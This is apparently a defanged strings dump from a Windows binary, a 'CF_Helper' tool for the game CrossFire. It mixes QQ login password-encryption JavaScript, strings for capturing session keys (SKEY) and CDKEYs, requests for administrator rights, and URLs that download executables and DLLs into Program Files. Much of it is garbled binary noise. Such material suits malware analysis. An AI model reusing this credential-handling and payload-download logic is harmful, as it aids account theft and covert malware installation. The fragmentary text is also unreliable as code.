hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
' ': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   '\n';
return t   aC.substring(z, aC.length)
return '0'   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length;   K) {
W[ae  ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x'   hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000'   c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len   rsaH1   s.TEA.strToBytes(salt)   vcodeLen   hexVcode);
s.TEA.initkey('');
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
@1970-01-01 08:00:00
\exdui.dll
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
%UD-Od
lI*wt.KK
%4u3\2t
W.ctn
.yEXjmS
Yn7%X
..RZd
A$#%DR
Wx.xlu
n.mJ~f#
Il%UVl_
.mDB`
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.0
\CF_data.ini
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
